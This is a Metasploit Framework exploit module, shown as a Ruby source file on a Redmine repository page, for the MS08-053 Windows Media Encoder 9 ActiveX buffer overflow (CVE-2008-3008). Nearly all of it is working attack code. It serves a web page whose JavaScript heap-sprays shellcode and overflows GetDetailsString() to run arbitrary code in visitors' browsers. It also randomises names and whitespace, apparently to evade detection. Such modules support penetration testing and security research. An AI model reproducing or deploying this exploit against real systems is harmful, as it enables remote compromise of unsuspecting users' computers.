/modules/exploits/windows/browser/ms08_053_mediaencoder.rb - Metasploit Framework - Metasploit Redmine Interface

| Branch: | Tag: | Revision:

root / modules / exploits / windows / browser / ms08_053_mediaencoder.rb @ master

History | View | Annotate | Download (3.3 kB)

       ##
       # $Id$
       ##
       ##
       # This file is part of the Metasploit Framework and may be subject to
       # redistribution and commercial restrictions. Please see the Metasploit
       # web site for more information on licensing and terms of use.
       #   http://metasploit.com/
       ##
       require 'msf/core'
       class Metasploit3 < Msf::Exploit::Remote
               Rank = NormalRanking
               include Msf::Exploit::Remote::HttpServer::HTML
               def initialize(info = {})
                       super(update_info(info,
                               'Name'           => 'Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow',
                               'Description'    => %q{
                                               This module exploits a stack buffer overflow in Windows Media Encoder 9. When
                                       sending an overly long string to the GetDetailsString() method of wmex.dll
                                       an attacker may be able to execute arbitrary code.
                               },
                               'License'        => MSF_LICENSE,
                               'Author'         => [ 'MC' ],
                               'Version'        => '$Revision$',
                               'References'     =>
+                                      [
                                               [ 'CVE', '2008-3008' ],
                                               [ 'OSVDB', '47962' ],
                                               [ 'BID', '31065' ],
                                               [ 'MSB', 'MS08-053' ],
                                       ],
                               'DefaultOptions' =>
+                                      {
                                               'EXITFUNC' => 'process',
                                       },
                               'Payload'        =>
+                                      {
                                               'Space'         => 1024,
                                               'BadChars'      => "\x00",
                                       },
                               'Platform'       => 'win',
                               'Targets'        =>
+                                      [
                                               [ 'Windows XP SP2-SP3 IE 6.0 SP0-SP2', { 'Ret' => 0x0C0C0C0C } ]
                                       ],
                               'DisclosureDate' => 'Sep 9 2008',
                               'DefaultTarget'  => 0))
               end
               def autofilter
                       false
               end
               def check_dependencies
                       use_zlib
               end
               def on_request_uri(cli, request)
                       # Re-generate the payload.
                       return if ((p = regenerate_payload(cli)) == nil)
                       # Encode the shellcode.
                       shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
                       # Create some nops.
                       nops    = Rex::Text.to_unescape(make_nops(4))
                       # Set the return.
                       ret     = Rex::Text.to_unescape([target.ret].pack('V'))
                       # Randomize the javascript variable names.
                       vname  = rand_text_alpha(rand(100) + 1)
                       var_i  = rand_text_alpha(rand(30)  + 2)
                       rand1  = rand_text_alpha(rand(100) + 1)
                       rand2  = rand_text_alpha(rand(100) + 1)
                       rand3  = rand_text_alpha(rand(100) + 1)
                       rand4  = rand_text_alpha(rand(100) + 1)
                       rand5  = rand_text_alpha(rand(100) + 1)
                       rand6  = rand_text_alpha(rand(100) + 1)
                       rand7  = rand_text_alpha(rand(100) + 1)
                       rand8  = rand_text_alpha(rand(100) + 1)
                       content = %Q|
                       <html>
                               <object id='#{vname}' classid='clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C'></object>
                               <script language="JavaScript">
                               var #{rand1} = unescape('#{shellcode}');
                               var #{rand2} = unescape('#{nops}');
                               var #{rand3} = 20;
                               var #{rand4} = #{rand3} + #{rand1}.length;
                               while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
                               var #{rand5} = #{rand2}.substring(0,#{rand4});
                               var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
                               while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
                               var #{rand7} = new Array();
                               for (#{var_i} = 0; #{var_i} < 600; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
                               var #{rand8} = "";
                               for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
                               #{vname}.GetDetailsString(#{rand8}, 1);
                               </script>
                       </html>
+                              |
                       content = Rex::Text.randomize_space(content)
                       print_status("Sending #{self.name}")
                       # Transmit the response to the client
                       send_response_html(cli, content)
                       # Handle the payload
                       handler(cli)
               end
       end